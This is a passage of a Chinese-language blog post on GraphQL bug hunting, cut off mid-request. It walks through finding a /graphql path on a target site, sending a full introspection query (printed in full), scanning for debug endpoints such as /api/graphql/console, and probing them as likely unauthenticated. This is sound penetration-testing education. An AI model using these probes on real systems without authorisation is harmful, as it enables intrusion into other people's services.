auto;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;padding: 0px 0px 0px 10px;border-style: solid;border-width: 0px 0px 1px;box-sizing: border-box;"><div style="font-size: 22px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GraphQL 和 Swagger 是什么关系？</span></p></div></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">很多人会把这两个当成完全不同的东西，其实可以这样理解：</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🔹 </span><strong style="box-sizing: border-box;"><span style="font-size: 14px;font-family: &#34;Noto Sans CJK SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgb(249, 110, 87);box-sizing: border-box;"><span leaf="">Swagger（传统接口文档）</span></span></strong></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">提前写好接口说明：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">URL</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">参数</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">返回</span></p></li></ul></p><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🔹 </span><strong style="box-sizing: border-box;"><span style="font-size: 14px;font-family: &#34;Noto Sans CJK SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgb(249, 110, 87);box-sizing: border-box;"><span leaf="">GraphQL（动态接口文档）</span></span></strong></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">接口是“自描述”的：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可以查询接口结构</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可以动态拼请求</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可以直接调试</span></p></li></ul></p><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">🧠 核心区别</span></em></strong></p></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="22.0000%" width="22.0000%" style="border-width: 0px;border-color: rgb(62, 62, 62);border-style: none;background-color: rgb(122, 175, 231);box-sizing: border-box;padding: 0px;"><div style="margin: 15px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">类型</span></strong></p></div></div></td><td data-colwidth="77.0000%" width="77.0000%" style="border-width: 0px;border-color: rgb(62, 62, 62);border-style: none;background-color: rgb(243, 100, 82);box-sizing: border-box;padding: 0px;"><div style="margin: 15px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">特点</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="22.0000%" width="22.0000%" style="border-width: 0px;border-color: rgb(62, 62, 62);border-style: none;background-color: rgb(239, 247, 255);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;color: rgb(122, 175, 231);box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Swagger</span></p></div></div></td><td data-colwidth="77.0000%" width="77.0000%" style="border-width: 0px;border-color: rgb(62, 62, 62);border-style: none;background-color: rgb(255, 241, 239);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(243, 100, 82);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">静态文档</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="22.0000%" width="22.0000%" style="border-width: 0px;border-color: rgb(62, 62, 62);border-style: none;background-color: rgb(239, 247, 255);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;color: rgb(122, 175, 231);box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GraphQL</span></p></div></div></td><td data-colwidth="77.0000%" width="77.0000%" style="border-width: 0px;border-color: rgb(62, 62, 62);border-style: none;background-color: rgb(255, 241, 239);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(243, 100, 82);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可查询的接口结构</span></p></div></div></td></tr></tbody></table></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">所以在挖洞时：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">GraphQL = 自带“接口枚举能力”的文档系统</span></strong></p></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 4px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;width: 27px;height: 27px;vertical-align: top;overflow: hidden;background-color: rgb(30, 30, 30);box-shadow: rgb(219, 219, 219) 7px 7px 0px 0px;box-sizing: border-box;"><div style="text-align: center;margin: 0px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2</span></p></div></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;padding: 0px 0px 0px 10px;border-style: solid;border-width: 0px 0px 1px;box-sizing: border-box;"><div style="font-size: 22px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">实战案例（500）</span></p></div></div></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">第一步：发现入口</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🔍 起点：一个普通功能点</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在测试过程中，点到了一个功能：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">删除地址</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017102" data-ratio="0.2220217" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=b6e284a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4mlR36rRDwMVEhibUGuZ3xSEmFC0oiaOuBmSibYXDHO8fRzIX7iaZ0cian9KbCCTUqkzRobhteH57rfQKuS71EerhYSOVf2aM69m198%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">顺手做了一件事</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">看目录结构</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">发现一个路径：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/graphql</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5902527" data-s="300,640" data-type="png" data-w="554" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100017100" src="https://wechat2rss.xlab.app/img-proxy/?k=602d97ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FDJX1rNqJe4n60JbsS6TKsBYpzVVRSNDU1HbcDVN9cbGYe8VUcuXCvsTfn7OYwe2SlXNpL8uIVM3771VRwVxVdphkwRcKic9pyAZD0Hs6JPg8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">⚠️ 这个路径意味着什么？</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在经验里：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">出现 /graphql，基本可以判断：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">存在 GraphQL 服务</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可能有调试接口</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">很可能存在接口暴露</span></p></li></ul></p><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">第二步：探测 GraphQL 是否可用</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">接下来就是一个标准动作：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">发一个 introspection 查询</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">📦 请求数据（核心）</span></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span><span class="code-snippet__attr">&#34;query&#34;</span><span class="code-snippet__punctuation">:</span><span class="code-snippet__string">&#34;query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}&#34;</span><span class="code-snippet__punctuation">}</span></span></code></pre></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.0578662" data-s="300,640" data-type="png" data-w="553" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100017101" src="https://wechat2rss.xlab.app/img-proxy/?k=46140ec8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FDJX1rNqJe4n75oZBQ081nRFDJj9gicgDsTwFoiaNqQQDZNribj7CwRiaGBg5ZZKraSHKqibnzkxMX9B5awP2EZXj3dInes5eGUV9xeSqt0y9jE1U%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🔍 返回结果</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">如果返回结构信息，比如：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">type</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">query</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">mutation</span></p></li></ul></p><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 就说明：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">GraphQL introspection 开启了</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">📌 这一步的意义</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 相当于：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">拿到了整个接口结构</span></strong></p></div></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">第三步：目录扫描</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">对 /graphql 目录进行扫描</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🔎 扫描结果</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">发现多个接口：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/api/graphql/console  </span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/api/graphql/graphql  </span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/api/graphql/graphql-playground  </span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/api/graphql/v1</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017104" data-ratio="0.6949458" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=8b9960ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4m6BJvgXMKWtHIlTpoSaiaQHPGrT8FTmLyvkPo24LLqmaTPmagAdibj9j9esgCXPh8iaS4VYlwGdYbK4ticQL3TKDqbE1EFIzeU0Dk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">⚠️ 这些路径意味着什么？</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">逐个解释👇</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">路径</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">作用</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">console    调试控制台    </span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">playground    图形化测试工具    </span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">graphql    主接口    </span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">v1    版本接口    </span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 重点来了：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这些“调试接口”，很多情况下是没有鉴权的</span></p></div></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">第四步：直接打 console</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">选择了一个最典型的接口：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">POST /api/graphql/console</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">📦 请求内容</span></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="swift"><code><span leaf=""><span class="code-snippet__type">POST</span> <span class="code-snippet__regexp">/api/</span>graphql<span class="code-snippet__regexp">/console HTTP/</span><span class="code-snippet__number">2</span></span></code><br/><code></code><br/><code><span leaf="">{<span class="code-snippet__string">&#34;query&#34;</span>:<span class="code-snippet__string">&#34;query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated 